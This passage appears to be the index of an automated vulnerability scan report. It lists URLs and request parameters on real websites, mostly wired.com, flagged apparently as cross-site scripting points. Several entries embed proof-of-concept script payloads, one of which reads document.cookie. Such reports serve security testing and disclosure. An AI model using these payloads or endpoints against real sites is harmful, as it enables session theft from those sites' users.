1.332. http://www.ninkasibrewing.com/home/content/css/print.css [REST URL parameter 1]

1.333. http://www.ninkasibrewing.com/home/content/js/basic.js [REST URL parameter 1]

1.334. http://www.ninkasibrewing.com/home/content/js/combined.css [REST URL parameter 1]

1.335. http://www.ninkasibrewing.com/home/content/js/combined.js [REST URL parameter 1]

1.336. http://www.ninkasibrewing.com/media/ [REST URL parameter 1]

1.337. http://www.ninkasibrewing.com/media/content/css/basic.css [REST URL parameter 1]

1.338. http://www.ninkasibrewing.com/media/content/css/ninkasi.css [REST URL parameter 1]

1.339. http://www.ninkasibrewing.com/media/content/css/print.css [REST URL parameter 1]

1.340. http://www.ninkasibrewing.com/media/content/js/basic.js [REST URL parameter 1]

1.341. http://www.ninkasibrewing.com/media/content/js/combined.css [REST URL parameter 1]

1.342. http://www.ninkasibrewing.com/media/content/js/combined.js [REST URL parameter 1]

1.343. http://www.ninkasibrewing.com/merchandise/ [REST URL parameter 1]

1.344. http://www.ninkasibrewing.com/merchandise/content/css/basic.css [REST URL parameter 1]

1.345. http://www.ninkasibrewing.com/merchandise/content/css/ninkasi.css [REST URL parameter 1]

1.346. http://www.ninkasibrewing.com/merchandise/content/css/print.css [REST URL parameter 1]

1.347. http://www.ninkasibrewing.com/merchandise/content/js/basic.js [REST URL parameter 1]

1.348. http://www.ninkasibrewing.com/merchandise/content/js/combined.css [REST URL parameter 1]

1.349. http://www.ninkasibrewing.com/merchandise/content/js/combined.js [REST URL parameter 1]

1.350. http://www.ninkasibrewing.com/nw_local_challenge/ [REST URL parameter 1]

1.351. http://www.ninkasibrewing.com/nw_local_challenge/content/css/basic.css [REST URL parameter 1]

1.352. http://www.ninkasibrewing.com/nw_local_challenge/content/css/ninkasi.css [REST URL parameter 1]

1.353. http://www.ninkasibrewing.com/nw_local_challenge/content/css/print.css [REST URL parameter 1]

1.354. http://www.ninkasibrewing.com/nw_local_challenge/content/js/basic.js [REST URL parameter 1]

1.355. http://www.ninkasibrewing.com/nw_local_challenge/content/js/combined.css [REST URL parameter 1]

1.356. http://www.ninkasibrewing.com/nw_local_challenge/content/js/combined.js [REST URL parameter 1]

1.357. http://www.ninkasibrewing.com/process/ [REST URL parameter 1]

1.358. http://www.ninkasibrewing.com/process/content/css/basic.css [REST URL parameter 1]

1.359. http://www.ninkasibrewing.com/process/content/css/ninkasi.css [REST URL parameter 1]

1.360. http://www.ninkasibrewing.com/process/content/css/print.css [REST URL parameter 1]

1.361. http://www.ninkasibrewing.com/process/content/js/basic.js [REST URL parameter 1]

1.362. http://www.ninkasibrewing.com/process/content/js/combined.css [REST URL parameter 1]

1.363. http://www.ninkasibrewing.com/process/content/js/combined.js [REST URL parameter 1]

1.364. http://www.ninkasibrewing.com/tasting_room/ [REST URL parameter 1]

1.365. http://www.ninkasibrewing.com/tasting_room/content/css/basic.css [REST URL parameter 1]

1.366. http://www.ninkasibrewing.com/tasting_room/content/css/ninkasi.css [REST URL parameter 1]

1.367. http://www.ninkasibrewing.com/tasting_room/content/css/print.css [REST URL parameter 1]

1.368. http://www.ninkasibrewing.com/tasting_room/content/js/basic.js [REST URL parameter 1]

1.369. http://www.ninkasibrewing.com/tasting_room/content/js/combined.css [REST URL parameter 1]

1.370. http://www.ninkasibrewing.com/tasting_room/content/js/combined.js [REST URL parameter 1]

1.371. http://www.ninkasibrewing.com/twitter/ [REST URL parameter 1]

1.372. http://www.ninkasibrewing.com/twitter/content/css/basic.css [REST URL parameter 1]

1.373. http://www.ninkasibrewing.com/twitter/content/css/ninkasi.css [REST URL parameter 1]

1.374. http://www.ninkasibrewing.com/twitter/content/css/print.css [REST URL parameter 1]

1.375. http://www.ninkasibrewing.com/twitter/content/js/basic.js [REST URL parameter 1]

1.376. http://www.ninkasibrewing.com/twitter/content/js/combined.css [REST URL parameter 1]

1.377. http://www.ninkasibrewing.com/twitter/content/js/combined.js [REST URL parameter 1]

1.378. http://www.opensecrets.org/politicians/contrib.php [cid parameter]

1.379. http://www.opensecrets.org/politicians/contrib.php [cycle parameter]

1.380. http://www.opensecrets.org/politicians/contrib.php [cycle parameter]

1.381. http://www.opensecrets.org/politicians/contrib.php [cycle parameter]

1.382. http://www.opensecrets.org/politicians/contrib.php [type parameter]

1.383. http://www.openstreetmap.org/ [mlat parameter]

1.384. http://www.openstreetmap.org/ [mlon parameter]

1.385. http://www.openstreetmap.org/ [zoom parameter]

1.386. http://www.partizan.com/partizan/musicvideos/ [name of an arbitrarily supplied request parameter]

1.387. http://www.partizan.com/partizan/musicvideos/ [saam_farahmand parameter]

1.388. http://www.physorg.com/ [name of an arbitrarily supplied request parameter]

1.389. http://www.physorg.com/rss-feed/ [REST URL parameter 1]

1.390. http://www.physorg.com/rss-feed/ [REST URL parameter 1]

1.391. http://www.physorg.com/rss-feed/ [REST URL parameter 1]

1.392. http://www.plosone.org/article/info:doi/10.1371/journal.pone.0015502 [name of an arbitrarily supplied request parameter]

1.393. http://www.plusmo.com/add [url parameter]

1.394. http://www.plusmo.com/add [url parameter]

1.395. http://www.plusmo.com/add [url parameter]

1.396. http://www.pollmonkey.com/s.asp [c parameter]

1.397. http://www.primidi.com/rss.xml [REST URL parameter 1]

1.398. http://www.primidi.com/rss.xml [REST URL parameter 1]

1.399. http://www.rockpapershotgun.com/2010/11/17/solving-biowares-code-shattered-steel/ [name of an arbitrarily supplied request parameter]

1.400. http://www.sega.com/games/sonic-colors/ [name of an arbitrarily supplied request parameter]

1.401. http://www.shacknews.com/ [name of an arbitrarily supplied request parameter]

1.402. http://www.slashgear.com/ [name of an arbitrarily supplied request parameter]

1.403. http://www.smartertravel.com/vacation-package/ [REST URL parameter 1]

1.404. http://www.streettech.com/ [name of an arbitrarily supplied request parameter]

1.405. http://www.streettech.com/backend.php [REST URL parameter 1]

1.406. http://www.stumbleupon.com/submit [url parameter]

1.407. http://www.stylelist.com/tag/SkinnyJeans/ [REST URL parameter 2]

1.408. http://www.stylelist.com/tag/SkinnyJeans/ [REST URL parameter 2]

1.409. http://www.stylelist.com/tag/SkinnyJeans/ [REST URL parameter 2]

1.410. http://www.stylelist.com/tag/SkinnyJeans/ [REST URL parameter 2]

1.411. http://www.stylelist.com/tag/SkinnyJeans/ [name of an arbitrarily supplied request parameter]

1.412. http://www.stylelist.com/tag/SkinnyJeans/ [name of an arbitrarily supplied request parameter]

1.413. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

1.414. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

1.415. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

1.416. https://www.survey-xact.dk/LinkCollector [key parameter]

1.417. http://www.thatsfit.com/2009/11/30/master-cleanse/ [name of an arbitrarily supplied request parameter]

1.418. http://www.thinkgeek.com/electronics/home-entertainment/cf9b/ [REST URL parameter 2]

1.419. http://www.treasuryandrisk.com/Issues/2010/October-2010/Pages/Getting-a-Grip-on-Intangibles.aspx [k parameter]

1.420. http://www.tuaw.com/ [name of an arbitrarily supplied request parameter]

1.421. http://www.twelvehorses.com/S1/RX1ANT/2LVIU6XP/M/ [REST URL parameter 4]

1.422. http://www.universalorlando.com/merchandise/HPCategoryList.aspx [categoryName parameter]

1.423. http://www.universalorlando.com/merchandise/HPProductDetail.aspx [CategoryName parameter]

1.424. http://www.universalorlando.com/merchandise/HPProductDetail.aspx [CategoryName parameter]

1.425. http://www.universalorlando.com/merchandise/HPProductList.aspx [CategoryName parameter]

1.426. http://www.usdbriefs.com/calendar/thyme/thyme/index.php [name of an arbitrarily supplied request parameter]

1.427. http://www.usdbriefs.com/calendar/thyme/thyme/index.php [name of an arbitrarily supplied request parameter]

1.428. http://www.wired.com/ajax/widgets/related/content/blogPost/autopia_29989 [REST URL parameter 1]

1.429. http://www.wired.com/ajax/widgets/related/content/blogPost/autopia_29989 [REST URL parameter 2]

1.430. http://www.wired.com/ajax/widgets/related/content/blogPost/autopia_29989 [REST URL parameter 3]

1.431. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25377 [REST URL parameter 1]

1.432. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25377 [REST URL parameter 2]

1.433. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25377 [REST URL parameter 3]

1.434. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25571 [REST URL parameter 1]

1.435. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25571 [REST URL parameter 2]

1.436. http://www.wired.com/ajax/widgets/related/content/blogPost/epicenter_25571 [REST URL parameter 3]

1.437. http://www.wired.com/ajax/widgets/related/content/blogPost/magazine_39648 [REST URL parameter 1]

1.438. http://www.wired.com/ajax/widgets/related/content/blogPost/magazine_39648 [REST URL parameter 2]

1.439. http://www.wired.com/ajax/widgets/related/content/blogPost/magazine_39648 [REST URL parameter 3]

1.440. http://www.wired.com/ajax/widgets/related/content/blogPost/playbook_3021 [REST URL parameter 1]

1.441. http://www.wired.com/ajax/widgets/related/content/blogPost/playbook_3021 [REST URL parameter 2]

1.442. http://www.wired.com/ajax/widgets/related/content/blogPost/playbook_3021 [REST URL parameter 3]

1.443. http://www.wired.com/ajax/widgets/related/content/blogPost/reviews_25843 [REST URL parameter 1]

1.444. http://www.wired.com/ajax/widgets/related/content/blogPost/reviews_25843 [REST URL parameter 2]

1.445. http://www.wired.com/ajax/widgets/related/content/blogPost/reviews_25843 [REST URL parameter 3]

1.446. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20877 [REST URL parameter 1]

1.447. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20877 [REST URL parameter 2]

1.448. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20877 [REST URL parameter 3]

1.449. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20913 [REST URL parameter 1]

1.450. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20913 [REST URL parameter 2]

1.451. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_20913 [REST URL parameter 3]

1.452. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_7588 [REST URL parameter 1]

1.453. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_7588 [REST URL parameter 2]

1.454. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_7588 [REST URL parameter 3]

1.455. http://www.wired.com/ajax/widgets/related/content/blogPost/underwire_53528 [REST URL parameter 1]

1.456. http://www.wired.com/ajax/widgets/related/content/blogPost/underwire_53528 [REST URL parameter 2]

1.457. http://www.wired.com/ajax/widgets/related/content/blogPost/underwire_53528 [REST URL parameter 3]

1.458. http://www.wired.com/blogs [REST URL parameter 1]

1.459. http://www.wired.com/blogs/ [REST URL parameter 1]

1.460. http://www.wired.com/cars [REST URL parameter 1]

1.461. http://www.wired.com/cars/ [REST URL parameter 1]

1.462. http://www.wired.com/cars/coolwheels [REST URL parameter 1]

1.463. http://www.wired.com/cars/coolwheels [REST URL parameter 2]

1.464. http://www.wired.com/cars/energy [REST URL parameter 1]

1.465. http://www.wired.com/cars/energy [REST URL parameter 2]

1.466. http://www.wired.com/cars/futuretransport [REST URL parameter 1]

1.467. http://www.wired.com/cars/futuretransport [REST URL parameter 2]

1.468. http://www.wired.com/culture [REST URL parameter 1]

1.469. http://www.wired.com/culture/ [REST URL parameter 1]

1.470. http://www.wired.com/culture/art [REST URL parameter 1]

1.471. http://www.wired.com/culture/art [REST URL parameter 2]

1.472. http://www.wired.com/culture/art/magazine/15-11/pl_arts [REST URL parameter 1]

1.473. http://www.wired.com/culture/art/magazine/15-11/pl_arts [REST URL parameter 2]

1.474. http://www.wired.com/culture/art/magazine/15-11/pl_arts [REST URL parameter 3]

1.475. http://www.wired.com/culture/art/magazine/16-09/ff_xray [REST URL parameter 1]

1.476. http://www.wired.com/culture/art/magazine/16-09/ff_xray [REST URL parameter 2]

1.477. http://www.wired.com/culture/art/magazine/16-09/ff_xray [REST URL parameter 3]

1.478. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [REST URL parameter 1]

1.479. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [REST URL parameter 2]

1.480. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [REST URL parameter 3]

1.481. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [name of an arbitrarily supplied request parameter]

1.482. http://www.wired.com/culture/art/multimedia/2008/07/ [REST URL parameter 1]

1.483. http://www.wired.com/culture/art/multimedia/2008/07/ [REST URL parameter 2]

1.484. http://www.wired.com/culture/art/multimedia/2008/07/ [REST URL parameter 3]

1.485. http://www.wired.com/culture/art/multimedia/2008/07/TKTKTK [REST URL parameter 1]

1.486. http://www.wired.com/culture/art/multimedia/2008/07/TKTKTK [REST URL parameter 2]

1.487. http://www.wired.com/culture/art/multimedia/2008/07/TKTKTK [REST URL parameter 3]

1.488. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [

1.489. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [

1.490. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 1]

1.491. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 2]

1.492. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [REST URL parameter 3]

1.493. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]

1.494. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]

1.495. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT

1.496. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT

1.497. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1">HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]

1.498. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]

1.499. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter]

1.500. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [name of an arbitrarily supplied request parameter]

1.501. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [slideView parameter]

1.502. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [REST URL parameter 1]

1.503. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [REST URL parameter 2]

1.504. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [REST URL parameter 3]

1.505. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [name of an arbitrarily supplied request parameter]

1.506. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [REST URL parameter 1]

1.507. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [REST URL parameter 2]

1.508. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [REST URL parameter 3]

1.509. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [name of an arbitrarily supplied request parameter]

1.510. http://www.wired.com/culture/art/news/2008/06/submissions_food [REST URL parameter 1]

1.511. http://www.wired.com/culture/art/news/2008/06/submissions_food [REST URL parameter 2]

1.512. http://www.wired.com/culture/art/news/2008/06/submissions_food [REST URL parameter 3]

1.513. http://www.wired.com/culture/culturereviews [REST URL parameter 1]

1.514. http://www.wired.com/culture/culturereviews [REST URL parameter 2]

1.515. http://www.wired.com/culture/design [REST URL parameter 1]

1.516. http://www.wired.com/culture/design [REST URL parameter 2]

1.517. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [REST URL parameter 1]

1.518. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [REST URL parameter 2]

1.519. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [REST URL parameter 3]

1.520. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [name of an arbitrarily supplied request parameter]

1.521. http://www.wired.com/culture/education [REST URL parameter 1]

1.522. http://www.wired.com/culture/education [REST URL parameter 2]

1.523. http://www.wired.com/culture/lifestyle [REST URL parameter 1]

1.524. http://www.wired.com/culture/lifestyle [REST URL parameter 2]

1.525. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [REST URL parameter 1]

1.526. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [REST URL parameter 2]

1.527. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [REST URL parameter 3]

1.528. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [name of an arbitrarily supplied request parameter]

1.529. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [REST URL parameter 1]

1.530. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [REST URL parameter 2]

1.531. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [REST URL parameter 3]

1.532. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [name of an arbitrarily supplied request parameter]

1.533. http://www.wired.com/culture/lifestyle/news/2005/01/66334 [REST URL parameter 1]

1.534. http://www.wired.com/culture/lifestyle/news/2005/01/66334 [REST URL parameter 2]

1.535. http://www.wired.com/culture/lifestyle/news/2005/01/66334 [REST URL parameter 3]

1.536. http://www.wired.com/culture/lifestyle/news/2005/01/66359 [REST URL parameter 1]

1.537. http://www.wired.com/culture/lifestyle/news/2005/01/66359 [REST URL parameter 2]

1.538. http://www.wired.com/culture/lifestyle/news/2005/01/66359 [REST URL parameter 3]

1.539. http://www.wired.com/customerservice [REST URL parameter 1]

1.540. http://www.wired.com/entertainment [REST URL parameter 1]

1.541. http://www.wired.com/entertainment/ [REST URL parameter 1]

1.542. http://www.wired.com/entertainment/hollywood [REST URL parameter 1]

1.543. http://www.wired.com/entertainment/hollywood [REST URL parameter 2]

1.544. http://www.wired.com/entertainment/music [REST URL parameter 1]

1.545. http://www.wired.com/entertainment/music [REST URL parameter 2]

1.546. http://www.wired.com/entertainment/music/news/2004/04/63263 [REST URL parameter 1]

1.547. http://www.wired.com/entertainment/music/news/2004/04/63263 [REST URL parameter 2]

1.548. http://www.wired.com/entertainment/music/news/2004/04/63263 [REST URL parameter 3]

1.549. http://www.wired.com/entertainment/music/news/2005/07/68124 [REST URL parameter 1]

1.550. http://www.wired.com/entertainment/music/news/2005/07/68124 [REST URL parameter 2]

1.551. http://www.wired.com/entertainment/music/news/2005/07/68124 [REST URL parameter 3]

1.552. http://www.wired.com/entertainment/theweb [REST URL parameter 1]

1.553. http://www.wired.com/entertainment/theweb [REST URL parameter 2]

1.554. http://www.wired.com/gadgets [REST URL parameter 1]

1.555. http://www.wired.com/gadgets/ [REST URL parameter 1]

1.556. http://www.wired.com/gadgets/digitalcameras [REST URL parameter 1]

1.557. http://www.wired.com/gadgets/digitalcameras [REST URL parameter 2]

1.558. http://www.wired.com/gadgets/displays [REST URL parameter 1]

1.559. http://www.wired.com/gadgets/displays [REST URL parameter 2]

1.560. http://www.wired.com/gadgets/gadgetreviews [REST URL parameter 1]

1.561. http://www.wired.com/gadgets/gadgetreviews [REST URL parameter 2]

1.562. http://www.wired.com/gadgets/mac [REST URL parameter 1]

1.563. http://www.wired.com/gadgets/mac [REST URL parameter 2]

1.564. http://www.wired.com/gadgets/miscellaneous [REST URL parameter 1]

1.565. http://www.wired.com/gadgets/miscellaneous [REST URL parameter 2]

1.566. http://www.wired.com/gadgets/mods [REST URL parameter 1]

1.567. http://www.wired.com/gadgets/mods [REST URL parameter 2]

1.568. http://www.wired.com/gadgets/pcs [REST URL parameter 1]

1.569. http://www.wired.com/gadgets/pcs [REST URL parameter 2]

1.570. http://www.wired.com/gadgets/portablemusic [REST URL parameter 1]

1.571. http://www.wired.com/gadgets/portablemusic [REST URL parameter 2]

1.572. http://www.wired.com/gadgets/wireless [REST URL parameter 1]

1.573. http://www.wired.com/gadgets/wireless [REST URL parameter 2]

1.574. http://www.wired.com/gaming [REST URL parameter 1]

1.575. http://www.wired.com/gaming/ [REST URL parameter 1]

1.576. http://www.wired.com/gaming/gamingreviews [REST URL parameter 1]

1.577. http://www.wired.com/gaming/gamingreviews [REST URL parameter 2]

1.578. http://www.wired.com/gaming/hardware [REST URL parameter 1]

1.579. http://www.wired.com/gaming/hardware [REST URL parameter 2]

1.580. http://www.wired.com/gaming/virtualworlds [REST URL parameter 1]

1.581. http://www.wired.com/gaming/virtualworlds [REST URL parameter 2]

1.582. http://www.wired.com/inspiredbyyou/2010/07/electric-car-grid/ [ibypid parameter]

1.583. http://www.wired.com/inspiredbyyou/2010/07/events-calendar [ibypid parameter]

1.584. http://www.wired.com/inspiredbyyou/2010/07/must-sees/ [ibypid parameter]

1.585. http://www.wired.com/inspiredbyyou/2010/07/the-list [ibypid parameter]

1.586. http://www.wired.com/inspiredbyyou/2010/07/tweetcarts [ibypid parameter]

1.587. http://www.wired.com/inspiredbyyou/2010/08/english-japanese-emoticon-translator/ [ibypid parameter]

1.588. http://www.wired.com/inspiredbyyou/2010/08/top-ten-most-popular-celebrities/ [ibypid parameter]

1.589. http://www.wired.com/inspiredbyyou/2010/09/ascent-of-robot/ [ibypid parameter]

1.590. http://www.wired.com/inspiredbyyou/2010/09/bittorrent-or-box-office/ [ibypid parameter]

1.591. http://www.wired.com/inspiredbyyou/2010/09/re-animators/ [ibypid parameter]

1.592. http://www.wired.com/inspiredbyyou/2010/09/the-molecular-pantry/ [ibypid parameter]

1.593. http://www.wired.com/inspiredbyyou/2010/10/buy-it-or-burn-it [ibypid parameter]

1.594. http://www.wired.com/inspiredbyyou/2010/10/peak-everything [ibypid parameter]

1.595. http://www.wired.com/inspiredbyyou/2010/10/turkeys-and-triumphs [ibypid parameter]

1.596. http://www.wired.com/inspiredbyyou/2010/11/avoiding-bad-holiday-albums [ibypid parameter]

1.597. http://www.wired.com/medtech [REST URL parameter 1]

1.598. http://www.wired.com/medtech/ [REST URL parameter 1]

1.599. http://www.wired.com/medtech/drugs [REST URL parameter 1]

1.600. http://www.wired.com/medtech/drugs [REST URL parameter 2]

1.601. http://www.wired.com/medtech/genetics [REST URL parameter 1]

1.602. http://www.wired.com/medtech/genetics [REST URL parameter 2]

1.603. http://www.wired.com/medtech/health [REST URL parameter 1]

1.604. http://www.wired.com/medtech/health [REST URL parameter 2]

1.605. http://www.wired.com/medtech/stemcells [REST URL parameter 1]

1.606. http://www.wired.com/medtech/stemcells [REST URL parameter 2]

1.607. http://www.wired.com/multimedia [REST URL parameter 1]

1.608. http://www.wired.com/multimedia/ [REST URL parameter 1]

1.609. http://www.wired.com/news/archive/2010-01/15/javascript-hack-enables-flash-on-iphone [REST URL parameter 2]

1.610. http://www.wired.com/news/archive/2010-01/15/javascript-hack-enables-flash-on-iphone [REST URL parameter 3]

1.611. http://www.wired.com/politics [REST URL parameter 1]

1.612. http://www.wired.com/politics/ [REST URL parameter 1]

1.613. http://www.wired.com/politics/law [REST URL parameter 1]

1.614. http://www.wired.com/politics/law [REST URL parameter 2]

1.615. http://www.wired.com/politics/onlinerights [REST URL parameter 1]

1.616. http://www.wired.com/politics/onlinerights [REST URL parameter 2]

1.617. http://www.wired.com/politics/security [REST URL parameter 1]

1.618. http://www.wired.com/politics/security [REST URL parameter 2]

1.619. http://www.wired.com/science [REST URL parameter 1]

1.620. http://www.wired.com/science/ [REST URL parameter 1]

1.621. http://www.wired.com/science/discoveries [REST URL parameter 1]

1.622. http://www.wired.com/science/discoveries [REST URL parameter 2]

1.623. http://www.wired.com/science/discoveries/news/1999/09/31631 [REST URL parameter 1]

1.624. http://www.wired.com/science/discoveries/news/1999/09/31631 [REST URL parameter 2]

1.625. http://www.wired.com/science/discoveries/news/1999/09/31631 [REST URL parameter 3]

1.626. http://www.wired.com/science/discoveries/news/2006/04/70701 [REST URL parameter 1]

1.627. http://www.wired.com/science/discoveries/news/2006/04/70701 [REST URL parameter 2]

1.628. http://www.wired.com/science/discoveries/news/2006/04/70701 [REST URL parameter 3]

1.629. http://www.wired.com/science/discoveries/news/2007/02/72573 [REST URL parameter 1]

1.630. http://www.wired.com/science/discoveries/news/2007/02/72573 [REST URL parameter 2]

1.631. http://www.wired.com/science/discoveries/news/2007/02/72573 [REST URL parameter 3]

1.632. http://www.wired.com/science/discoveries/news/2007/02/72649 [REST URL parameter 1]

1.633. http://www.wired.com/science/discoveries/news/2007/02/72649 [REST URL parameter 2]

1.634. http://www.wired.com/science/discoveries/news/2007/02/72649 [REST URL parameter 3]

1.635. http://www.wired.com/science/discoveries/news/2007/03/72723 [REST URL parameter 1]

1.636. http://www.wired.com/science/discoveries/news/2007/03/72723 [REST URL parameter 2]

1.637. http://www.wired.com/science/discoveries/news/2007/03/72723 [REST URL parameter 3]

1.638. http://www.wired.com/science/discoveries/news/2007/03/72805 [REST URL parameter 1]

1.639. http://www.wired.com/science/discoveries/news/2007/03/72805 [REST URL parameter 2]

1.640. http://www.wired.com/science/discoveries/news/2007/03/72805 [REST URL parameter 3]

1.641. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0408 [REST URL parameter 1]

1.642. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0408 [REST URL parameter 2]

1.643. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0408 [REST URL parameter 3]

1.644. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0411 [REST URL parameter 1]

1.645. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0411 [REST URL parameter 2]

1.646. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0411 [REST URL parameter 3]

1.647. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0426 [REST URL parameter 1]

1.648. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0426 [REST URL parameter 2]

1.649. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0426 [REST URL parameter 3]

1.650. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0427 [REST URL parameter 1]

1.651. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0427 [REST URL parameter 2]

1.652. http://www.wired.com/science/discoveries/news/2007/04/dayintech_0427 [REST URL parameter 3]

1.653. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0503 [REST URL parameter 1]

1.654. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0503 [REST URL parameter 2]

1.655. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0503 [REST URL parameter 3]

1.656. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0515 [REST URL parameter 1]

1.657. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0515 [REST URL parameter 2]

1.658. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0515 [REST URL parameter 3]

1.659. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0524 [REST URL parameter 1]

1.660. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0524 [REST URL parameter 2]

1.661. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0524 [REST URL parameter 3]

1.662. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0528 [REST URL parameter 1]

1.663. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0528 [REST URL parameter 2]

1.664. http://www.wired.com/science/discoveries/news/2007/05/dayintech_0528 [REST URL parameter 3]

1.665. http://www.wired.com/science/discoveries/news/2007/06/dayintech_0629 [REST URL parameter 1]

1.666. http://www.wired.com/science/discoveries/news/2007/06/dayintech_0629 [REST URL parameter 2]

1.667. http://www.wired.com/science/discoveries/news/2007/06/dayintech_0629 [REST URL parameter 3]

1.668. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0903 [REST URL parameter 1]

1.669. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0903 [REST URL parameter 2]

1.670. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0903 [REST URL parameter 3]

1.671. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0904 [REST URL parameter 1]

1.672. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0904 [REST URL parameter 2]

1.673. http://www.wired.com/science/discoveries/news/2007/09/dayintech_0904 [REST URL parameter 3]

1.674. http://www.wired.com/science/discoveries/news/2007/10/dayintech_1010 [REST URL parameter 1]

1.675. http://www.wired.com/science/discoveries/news/2007/10/dayintech_1010 [REST URL parameter 2]

1.676. http://www.wired.com/science/discoveries/news/2007/10/dayintech_1010 [REST URL parameter 3]

1.677. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1105 [REST URL parameter 1]

1.678. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1105 [REST URL parameter 2]

1.679. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1105 [REST URL parameter 3]

1.680. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1112 [REST URL parameter 1]

1.681. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1112 [REST URL parameter 2]

1.682. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1112 [REST URL parameter 3]

1.683. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1119 [REST URL parameter 1]

1.684. http://www.wired.com/science/discoveries/news/2007/11/dayintech_1119 [REST URL parameter 2]

